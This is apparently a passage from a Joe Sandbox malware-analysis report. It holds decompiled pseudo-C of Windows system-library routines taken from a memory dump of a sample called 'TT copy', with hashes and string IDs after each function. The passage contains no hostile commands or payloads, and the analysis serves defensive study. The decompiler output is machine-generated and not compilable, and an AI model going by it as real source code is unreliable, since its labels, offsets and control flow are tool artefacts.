                                                                                                            				void* _t135;
                                                                                                            				signed int _t139;
                                                                                                            				signed int* _t141;
                                                                                                            				signed int _t146;
                                                                                                            				signed int _t147;
                                                                                                            				void* _t153;
                                                                                                            				signed int _t155;
                                                                                                            				signed int _t159;
                                                                                                            				char _t166;
                                                                                                            				void* _t172;
                                                                                                            				void* _t176;
                                                                                                            				signed int _t177;
                                                                                                            				intOrPtr* _t179;
                                                                                                            
                                                                                                            				_t179 = __ecx;
                                                                                                            				_v48 = __edx;
                                                                                                            				_v68 = 0;
                                                                                                            				_v72 = 0;
                                                                                                            				_push(__ecx[1]);
                                                                                                            				_push( *__ecx);
                                                                                                            				_push(0);
                                                                                                            				_t153 = 0x14;
                                                                                                            				_t135 = _t153;
                                                                                                            				_t132 = E0112BBBB(_t135, _t153);
                                                                                                            				if(_t132 == 0) {
                                                                                                            					_t166 = _v68;
                                                                                                            					goto L43;
                                                                                                            				} else {
                                                                                                            					_t155 = 0;
                                                                                                            					_v52 = 0;
                                                                                                            					asm("stosd");
                                                                                                            					asm("stosd");
                                                                                                            					asm("stosd");
                                                                                                            					asm("stosd");
                                                                                                            					asm("stosd");
                                                                                                            					_v56 = __ecx[1];
                                                                                                            					if( *__ecx >> 8 < 2) {
                                                                                                            						_t155 = 1;
                                                                                                            						_v52 = 1;
                                                                                                            					}
                                                                                                            					_t139 = _a4;
                                                                                                            					_t87 = (_t155 << 0xc) + _t139;
                                                                                                            					_v60 = _t87;
                                                                                                            					if(_t87 < _t139) {
                                                                                                            						L11:
                                                                                                            						_t166 = _v68;
                                                                                                            						L12:
                                                                                                            						if(_t132 != 0) {
                                                                                                            							E0112BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                                                            						}
                                                                                                            						L43:
                                                                                                            						if(_v72 != 0) {
                                                                                                            							_push( *((intOrPtr*)(_t179 + 4)));
                                                                                                            							_push( *_t179);
                                                                                                            							_push(0x8000);
                                                                                                            							E0112AFDE( &_v72,  &_v60);
                                                                                                            						}
                                                                                                            						L46:
                                                                                                            						return _t166;
                                                                                                            					}
                                                                                                            					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                                                            					asm("sbb edi, edi");
                                                                                                            					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                                                            					if(_t90 != 0) {
                                                                                                            						_push(0);
                                                                                                            						_push(0x14);
                                                                                                            						_push( &_v44);
                                                                                                            						_push(3);
                                                                                                            						_push(_t179);
                                                                                                            						_push(0xffffffff);
                                                                                                            						if(E010A9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                                                            							_push(_t139);
                                                                                                            							E0112A80D(_t179, 1, _v40, 0);
                                                                                                            							_t172 = 4;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t141 =  &_v72;
                                                                                                            					if(E0112A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                                                            						_v64 = _a4;
                                                                                                            						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                                                            						asm("sbb edi, edi");
                                                                                                            						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                                                            						if(_t94 != 0) {
                                                                                                            							_push(0);
                                                                                                            							_push(0x14);
                                                                                                            							_push( &_v24);
                                                                                                            							_push(3);
                                                                                                            							_push(_t179);
                                                                                                            							_push(0xffffffff);
                                                                                                            							if(E010A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                                                            								_push(_t141);
                                                                                                            								E0112A80D(_t179, 1, _v20, 0);
                                                                                                            								_t176 = 4;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if(E0112A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                                                            							goto L11;
                                                                                                            						} else {
                                                                                                            							_t177 = _v64;
                                                                                                            							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                                                            							_t100 = _v52 + _v52;
                                                                                                            							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                                                            							 *(_t132 + 0x10) = _t146;
                                                                                                            							asm("bsf eax, [esp+0x18]");
                                                                                                            							_v52 = _t100;
                                                                                                            							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                                                            							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                                                            							_t47 =  &_a8;
                                                                                                            							 *_t47 = _a8 & 0x00000001;
                                                                                                            							if( *_t47 == 0) {
                                                                                                            								E01082280(_t179 + 0x30, _t179 + 0x30);
                                                                                                            							}
                                                                                                            							_t147 =  *(_t179 + 0x34);
                                                                                                            							_t159 =  *(_t179 + 0x38) & 1;
                                                                                                            							_v68 = 0;
                                                                                                            							if(_t147 == 0) {
                                                                                                            								L35:
                                                                                                            								E0107B090(_t179 + 0x34, _t147, _v68, _t132);
                                                                                                            								if(_a8 == 0) {
                                                                                                            									E0107FFB0(_t132, _t177, _t179 + 0x30);
                                                                                                            								}
                                                                                                            								asm("lock xadd [eax], ecx");
                                                                                                            								asm("lock xadd [eax], edx");
                                                                                                            								_t132 = 0;
                                                                                                            								_v72 = _v72 & 0;
                                                                                                            								_v68 = _v72;
                                                                                                            								if(E01087D50() == 0) {
                                                                                                            									_t113 = 0x7ffe0388;
                                                                                                            								} else {
                                                                                                            									_t177 = _v64;
                                                                                                            									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                            								}
                                                                                                            								if( *_t113 == _t132) {
                                                                                                            									_t166 = _v68;
                                                                                                            									goto L46;
                                                                                                            								} else {
                                                                                                            									_t166 = _v68;
                                                                                                            									E0111FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                                                            									goto L12;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								L23:
                                                                                                            								while(1) {
                                                                                                            									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                                                            										_t122 =  *_t147;
                                                                                                            										if(_t159 == 0) {
                                                                                                            											L32:
                                                                                                            											if(_t122 == 0) {
                                                                                                            												L34:
                                                                                                            												_v68 = 0;
                                                                                                            												goto L35;
                                                                                                            											}
                                                                                                            											L33:
                                                                                                            											_t147 = _t122;
                                                                                                            											continue;
                                                                                                            										}
                                                                                                            										if(_t122 == 0) {
                                                                                                            											goto L34;
                                                                                                            										}
                                                                                                            										_t122 = _t122 ^ _t147;
                                                                                                            										goto L32;
                                                                                                            									}
                                                                                                            									_t122 =  *(_t147 + 4);
                                                                                                            									if(_t159 == 0) {
                                                                                                            										L27:
                                                                                                            										if(_t122 != 0) {
                                                                                                            											goto L33;
                                                                                                            										}
                                                                                                            										L28:
                                                                                                            										_v68 = 1;
                                                                                                            										goto L35;
                                                                                                            									}
                                                                                                            									if(_t122 == 0) {
                                                                                                            										goto L28;
                                                                                                            									}
                                                                                                            									_t122 = _t122 ^ _t147;
                                                                                                            									goto L27;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_v72 = _v72 & 0x00000000;
                                                                                                            					goto L11;
                                                                                                            				}
                                                                                                            			}

                                                                                                            0x0112e691
                                                                                                            0x0112e691
                                                                                                            0x0112e66e
                                                                                                            0x0112e6b0
                                                                                                            0x00000000
                                                                                                            0x0112e6b6
                                                                                                            0x0112e6bd
                                                                                                            0x0112e6c7
                                                                                                            0x0112e6d7
                                                                                                            0x0112e6d9
                                                                                                            0x0112e6db
                                                                                                            0x0112e6de
                                                                                                            0x0112e6e3
                                                                                                            0x0112e6f3
                                                                                                            0x0112e6fc
                                                                                                            0x0112e700
                                                                                                            0x0112e700
                                                                                                            0x0112e704
                                                                                                            0x0112e70a
                                                                                                            0x0112e70a
                                                                                                            0x0112e713
                                                                                                            0x0112e716
                                                                                                            0x0112e719
                                                                                                            0x0112e720
                                                                                                            0x0112e761
                                                                                                            0x0112e76b
                                                                                                            0x0112e774
                                                                                                            0x0112e77a
                                                                                                            0x0112e77a
                                                                                                            0x0112e78a
                                                                                                            0x0112e791
                                                                                                            0x0112e799
                                                                                                            0x0112e79b
                                                                                                            0x0112e79f
                                                                                                            0x0112e7aa
                                                                                                            0x0112e7c0
                                                                                                            0x0112e7ac
                                                                                                            0x0112e7b2
                                                                                                            0x0112e7b9
                                                                                                            0x0112e7b9
                                                                                                            0x0112e7c7
                                                                                                            0x0112e806
                                                                                                            0x00000000
                                                                                                            0x0112e7c9
                                                                                                            0x0112e7d1
                                                                                                            0x0112e7d8
                                                                                                            0x00000000
                                                                                                            0x0112e7d8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112e722
                                                                                                            0x0112e72e
                                                                                                            0x0112e748
                                                                                                            0x0112e74c
                                                                                                            0x0112e754
                                                                                                            0x0112e756
                                                                                                            0x0112e75c
                                                                                                            0x0112e75c
                                                                                                            0x00000000
                                                                                                            0x0112e75c
                                                                                                            0x0112e758
                                                                                                            0x0112e758
                                                                                                            0x00000000
                                                                                                            0x0112e758
                                                                                                            0x0112e750
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112e752
                                                                                                            0x00000000
                                                                                                            0x0112e752
                                                                                                            0x0112e730
                                                                                                            0x0112e735
                                                                                                            0x0112e73d
                                                                                                            0x0112e73f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112e741
                                                                                                            0x0112e741
                                                                                                            0x00000000
                                                                                                            0x0112e741
                                                                                                            0x0112e739
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112e73b
                                                                                                            0x00000000
                                                                                                            0x0112e73b
                                                                                                            0x0112e722
                                                                                                            0x0112e720
                                                                                                            0x0112e6b0
                                                                                                            0x0112e618
                                                                                                            0x00000000
                                                                                                            0x0112e618

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: `$`
                                                                                                            • API String ID: 0-197956300
                                                                                                            • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                            • Instruction ID: e29ff20ff6cab1bbaf24652eab5e03b0e686c83b3a57b285e9171e9691042d0d
                                                                                                            • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                            • Instruction Fuzzy Hash: 6891A3312057529FE728CF29C841B5BBBE5BF84714F14892DFA95CB280E774E814CB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 77%
                                                                                                            			E010E51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				signed short* _t63;
                                                                                                            				signed int _t64;
                                                                                                            				signed int _t65;
                                                                                                            				signed int _t67;
                                                                                                            				intOrPtr _t74;
                                                                                                            				intOrPtr _t84;
                                                                                                            				intOrPtr _t88;
                                                                                                            				intOrPtr _t94;
                                                                                                            				void* _t100;
                                                                                                            				void* _t103;
                                                                                                            				intOrPtr _t105;
                                                                                                            				signed int _t106;
                                                                                                            				short* _t108;
                                                                                                            				signed int _t110;
                                                                                                            				signed int _t113;
                                                                                                            				signed int* _t115;
                                                                                                            				signed short* _t117;
                                                                                                            				void* _t118;
                                                                                                            				void* _t119;
                                                                                                            
                                                                                                            				_push(0x80);
                                                                                                            				_push(0x11405f0);
                                                                                                            				E010BD0E8(__ebx, __edi, __esi);
                                                                                                            				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                                                            				_t115 =  *(_t118 + 0xc);
                                                                                                            				 *(_t118 - 0x7c) = _t115;
                                                                                                            				 *((char*)(_t118 - 0x65)) = 0;
                                                                                                            				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                                            				_t113 = 0;
                                                                                                            				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                                                            				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                                                            				_t100 = __ecx;
                                                                                                            				if(_t100 == 0) {
                                                                                                            					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                                            					E0107EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                            					 *((char*)(_t118 - 0x65)) = 1;
                                                                                                            					_t63 =  *(_t118 - 0x90);
                                                                                                            					_t101 = _t63[2];
                                                                                                            					_t64 =  *_t63 & 0x0000ffff;
                                                                                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                                            					L20:
                                                                                                            					_t65 = _t64 >> 1;
                                                                                                            					L21:
                                                                                                            					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                                                            					if(_t108 == 0) {
                                                                                                            						L27:
                                                                                                            						 *_t115 = _t65 + 1;
                                                                                                            						_t67 = 0xc0000023;
                                                                                                            						L28:
                                                                                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                                                            						L29:
                                                                                                            						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                                                            						E010E53CA(0);
                                                                                                            						return E010BD130(0, _t113, _t115);
                                                                                                            					}
                                                                                                            					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                                                            						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                                                            							 *_t108 = 0;
                                                                                                            						}
                                                                                                            						goto L27;
                                                                                                            					}
                                                                                                            					 *_t115 = _t65;
                                                                                                            					_t115 = _t65 + _t65;
                                                                                                            					E010AF3E0(_t108, _t101, _t115);
                                                                                                            					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                                                            					_t67 = 0;
                                                                                                            					goto L28;
                                                                                                            				}
                                                                                                            				_t103 = _t100 - 1;
                                                                                                            				if(_t103 == 0) {
                                                                                                            					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                                                            					_t74 = E01083690(1, _t117, 0x1041810, _t118 - 0x74);
                                                                                                            					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                                                            					_t101 = _t117[2];
                                                                                                            					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                                                            					if(_t74 < 0) {
                                                                                                            						_t64 =  *_t117 & 0x0000ffff;
                                                                                                            						_t115 =  *(_t118 - 0x7c);
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                                                            					_t115 =  *(_t118 - 0x7c);
                                                                                                            					goto L21;
                                                                                                            				}
                                                                                                            				if(_t103 == 1) {
                                                                                                            					_t105 = 4;
                                                                                                            					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                                                            					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                                                            					_push(_t118 - 0x70);
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push(_t105);
                                                                                                            					_push(_t118 - 0x78);
                                                                                                            					_push(0x6b);
                                                                                                            					 *((intOrPtr*)(_t118 - 0x64)) = E010AAA90();
                                                                                                            					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                                                            					_t113 = L01084620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                                                            					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                                                            					if(_t113 != 0) {
                                                                                                            						_push(_t118 - 0x70);
                                                                                                            						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                                                            						_push(_t113);
                                                                                                            						_push(4);
                                                                                                            						_push(_t118 - 0x78);
                                                                                                            						_push(0x6b);
                                                                                                            						_t84 = E010AAA90();
                                                                                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                                                            						if(_t84 < 0) {
                                                                                                            							goto L29;
                                                                                                            						}
                                                                                                            						_t110 = 0;
                                                                                                            						_t106 = 0;
                                                                                                            						while(1) {
                                                                                                            							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                                                            							 *(_t118 - 0x88) = _t106;
                                                                                                            							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                                                            							_t106 = _t106 + 1;
                                                                                                            						}
                                                                                                            						_t88 = E010E500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                                                            						_t119 = _t119 + 0x1c;
                                                                                                            						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                                                            						if(_t88 < 0) {
                                                                                                            							goto L29;
                                                                                                            						}
                                                                                                            						_t101 = _t118 - 0x3c;
                                                                                                            						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                                                            						goto L21;
                                                                                                            					}
                                                                                                            					_t67 = 0xc0000017;
                                                                                                            					goto L28;
                                                                                                            				}
                                                                                                            				_push(0);
                                                                                                            				_push(0x20);
                                                                                                            				_push(_t118 - 0x60);
                                                                                                            				_push(0x5a);
                                                                                                            				_t94 = E010A9860();
                                                                                                            				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                                                            				if(_t94 < 0) {
                                                                                                            					goto L29;
                                                                                                            				}
                                                                                                            				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                                                            					_t101 = L"Legacy";
                                                                                                            					_push(6);
                                                                                                            				} else {
                                                                                                            					_t101 = L"UEFI";
                                                                                                            					_push(4);
                                                                                                            				}
                                                                                                            				_pop(_t65);
                                                                                                            				goto L21;
                                                                                                            			}























                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: Legacy$UEFI
                                                                                                            • API String ID: 2994545307-634100481
                                                                                                            • Opcode ID: a865e97f09caea41f5d287a2997c7b48274db0ab4aced92aebba0e41efc6031b
                                                                                                            • Instruction ID: 3046290993e13b5a68788241343348a76c409297d936ac099a3f089dd9fed263
                                                                                                            • Opcode Fuzzy Hash: a865e97f09caea41f5d287a2997c7b48274db0ab4aced92aebba0e41efc6031b
                                                                                                            • Instruction Fuzzy Hash: 2A517DB5A006099FDB24DFA9CD84BADBBF8FB48704F14886DE689EB251D7719900CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 76%
                                                                                                            			E0108B944(signed int* __ecx, char __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				char _v28;
                                                                                                            				signed int _v32;
                                                                                                            				char _v36;
                                                                                                            				signed int _v40;
                                                                                                            				intOrPtr _v44;
                                                                                                            				signed int* _v48;
                                                                                                            				signed int _v52;
                                                                                                            				signed int _v56;
                                                                                                            				intOrPtr _v60;
                                                                                                            				intOrPtr _v64;
                                                                                                            				intOrPtr _v68;
                                                                                                            				intOrPtr _v72;
                                                                                                            				intOrPtr _v76;
                                                                                                            				char _v77;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr* _t65;
                                                                                                            				intOrPtr _t67;
                                                                                                            				intOrPtr _t68;
                                                                                                            				char* _t73;
                                                                                                            				intOrPtr _t77;
                                                                                                            				intOrPtr _t78;
                                                                                                            				signed int _t82;
                                                                                                            				intOrPtr _t83;
                                                                                                            				void* _t87;
                                                                                                            				char _t88;
                                                                                                            				intOrPtr* _t89;
                                                                                                            				intOrPtr _t91;
                                                                                                            				void* _t97;
                                                                                                            				intOrPtr _t100;
                                                                                                            				void* _t102;
                                                                                                            				void* _t107;
                                                                                                            				signed int _t108;
                                                                                                            				intOrPtr* _t112;
                                                                                                            				void* _t113;
                                                                                                            				intOrPtr* _t114;
                                                                                                            				intOrPtr _t115;
                                                                                                            				intOrPtr _t116;
                                                                                                            				intOrPtr _t117;
                                                                                                            				signed int _t118;
                                                                                                            				void* _t130;
                                                                                                            
                                                                                                            				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                                            				_v8 =  *0x115d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                                            				_t112 = __ecx;
                                                                                                            				_v77 = __edx;
                                                                                                            				_v48 = __ecx;
                                                                                                            				_v28 = 0;
                                                                                                            				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                                            				_t105 =  *_t5;
                                                                                                            				_v20 = 0;
                                                                                                            				_v16 = 0;
                                                                                                            				if(_t105 == 0) {
                                                                                                            					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                                            					_t60 =  *__ecx |  *_t50;
                                                                                                            					if(( *__ecx |  *_t50) != 0) {
                                                                                                            						 *__ecx = 0;
                                                                                                            						__ecx[1] = 0;
                                                                                                            						if(E01087D50() != 0) {
                                                                                                            							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            						} else {
                                                                                                            							_t65 = 0x7ffe0386;
                                                                                                            						}
                                                                                                            						if( *_t65 != 0) {
                                                                                                            							E01138CD6(_t112);
                                                                                                            						}
                                                                                                            						_push(0);
                                                                                                            						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                                            						_push( *_t52);
                                                                                                            						_t60 = E010A9E20();
                                                                                                            					}
                                                                                                            					L20:
                                                                                                            					_pop(_t107);
                                                                                                            					_pop(_t113);
                                                                                                            					_pop(_t87);
                                                                                                            					return E010AB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                                            				}
                                                                                                            				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                                            				_t67 =  *_t8;
                                                                                                            				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                                            				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                                            				_t108 =  *(_t67 + 0x14);
                                                                                                            				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                                            				_t105 = 0x2710;
                                                                                                            				asm("sbb eax, edi");
                                                                                                            				_v44 = _t88;
                                                                                                            				_v52 = _t108;
                                                                                                            				_t60 = E010ACE00(_t97, _t68, 0x2710, 0);
                                                                                                            				_v56 = _t60;
                                                                                                            				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                                            					L3:
                                                                                                            					 *(_t112 + 0x44) = _t60;
                                                                                                            					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                                            					 *_t112 = _t88;
                                                                                                            					 *(_t112 + 4) = _t108;
                                                                                                            					_v20 = _t60 * 0x2710;
                                                                                                            					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                                            					if(_v77 != 0) {
                                                                                                            						L16:
                                                                                                            						_v36 = _t88;
                                                                                                            						_v32 = _t108;
                                                                                                            						if(E01087D50() != 0) {
                                                                                                            							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                            						} else {
                                                                                                            							_t73 = 0x7ffe0386;
                                                                                                            						}
                                                                                                            						if( *_t73 != 0) {
                                                                                                            							_t105 = _v40;
                                                                                                            							E01138F6A(_t112, _v40, _t88, _t108);
                                                                                                            						}
                                                                                                            						_push( &_v28);
                                                                                                            						_push(0);
                                                                                                            						_push( &_v36);
                                                                                                            						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                                            						_push( *_t48);
                                                                                                            						_t60 = E010AAF60();
                                                                                                            						goto L20;
                                                                                                            					} else {
                                                                                                            						_t89 = 0x7ffe03b0;
                                                                                                            						do {
                                                                                                            							_t114 = 0x7ffe0010;
                                                                                                            							do {
                                                                                                            								_t77 =  *0x1158628; // 0x0
                                                                                                            								_v68 = _t77;
                                                                                                            								_t78 =  *0x115862c; // 0x0
                                                                                                            								_v64 = _t78;
                                                                                                            								_v72 =  *_t89;
                                                                                                            								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                                            								while(1) {
                                                                                                            									_t105 =  *0x7ffe000c;
                                                                                                            									_t100 =  *0x7ffe0008;
                                                                                                            									if(_t105 ==  *_t114) {
                                                                                                            										goto L8;
                                                                                                            									}
                                                                                                            									asm("pause");
                                                                                                            								}
                                                                                                            								L8:
                                                                                                            								_t89 = 0x7ffe03b0;
                                                                                                            								_t115 =  *0x7ffe03b0;
                                                                                                            								_t82 =  *0x7FFE03B4;
                                                                                                            								_v60 = _t115;
                                                                                                            								_t114 = 0x7ffe0010;
                                                                                                            								_v56 = _t82;
                                                                                                            							} while (_v72 != _t115 || _v76 != _t82);
                                                                                                            							_t83 =  *0x1158628; // 0x0
                                                                                                            							_t116 =  *0x115862c; // 0x0
                                                                                                            							_v76 = _t116;
                                                                                                            							_t117 = _v68;
                                                                                                            						} while (_t117 != _t83 || _v64 != _v76);
                                                                                                            						asm("sbb edx, [esp+0x24]");
                                                                                                            						_t102 = _t100 - _v60 - _t117;
                                                                                                            						_t112 = _v48;
                                                                                                            						_t91 = _v44;
                                                                                                            						asm("sbb edx, eax");
                                                                                                            						_t130 = _t105 - _v52;
                                                                                                            						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                                            							_t88 = _t102 - _t91;
                                                                                                            							asm("sbb edx, edi");
                                                                                                            							_t108 = _t105;
                                                                                                            						} else {
                                                                                                            							_t88 = 0;
                                                                                                            							_t108 = 0;
                                                                                                            						}
                                                                                                            						goto L16;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					if( *(_t112 + 0x44) == _t60) {
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					goto L3;
                                                                                                            				}
                                                                                                            			}

















































                                                                                                            APIs
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0108B9A5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 885266447-0
                                                                                                            • Opcode ID: edc5a41f91437cd272a2367013261f744730661ef634405e6c5b01bb6c913a45
                                                                                                            • Instruction ID: 5238df192b994e25c27ba2b4a97047d22a24986f7db6b0d38c74d7e68cf311dd
                                                                                                            • Opcode Fuzzy Hash: edc5a41f91437cd272a2367013261f744730661ef634405e6c5b01bb6c913a45
                                                                                                            • Instruction Fuzzy Hash: 34515771A08741CFC764EF6DC09092AFBE5FB88610F1489AEE6D687355D770E844CB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E0106B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                                            				signed int _t65;
                                                                                                            				signed short _t69;
                                                                                                            				intOrPtr _t70;
                                                                                                            				signed short _t85;
                                                                                                            				void* _t86;
                                                                                                            				signed short _t89;
                                                                                                            				signed short _t91;
                                                                                                            				intOrPtr _t92;
                                                                                                            				intOrPtr _t97;
                                                                                                            				intOrPtr* _t98;
                                                                                                            				signed short _t99;
                                                                                                            				signed short _t101;
                                                                                                            				void* _t102;
                                                                                                            				char* _t103;
                                                                                                            				signed short _t104;
                                                                                                            				intOrPtr* _t110;
                                                                                                            				void* _t111;
                                                                                                            				void* _t114;
                                                                                                            				intOrPtr* _t115;
                                                                                                            
                                                                                                            				_t109 = __esi;
                                                                                                            				_t108 = __edi;
                                                                                                            				_t106 = __edx;
                                                                                                            				_t95 = __ebx;
                                                                                                            				_push(0x90);
                                                                                                            				_push(0x113f7a8);
                                                                                                            				E010BD0E8(__ebx, __edi, __esi);
                                                                                                            				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                                            				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                                            				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                                            				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                                            				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                                            				if(__edx == 0xffffffff) {
                                                                                                            					L6:
                                                                                                            					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                                            					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                                            					__eflags = _t65 & 0x00000002;
                                                                                                            					if((_t65 & 0x00000002) != 0) {
                                                                                                            						L3:
                                                                                                            						L4:
                                                                                                            						return E010BD130(_t95, _t108, _t109);
                                                                                                            					}
                                                                                                            					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                                            					_t108 = 0;
                                                                                                            					_t109 = 0;
                                                                                                            					_t95 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            					while(1) {
                                                                                                            						__eflags = _t95 - 0x200;
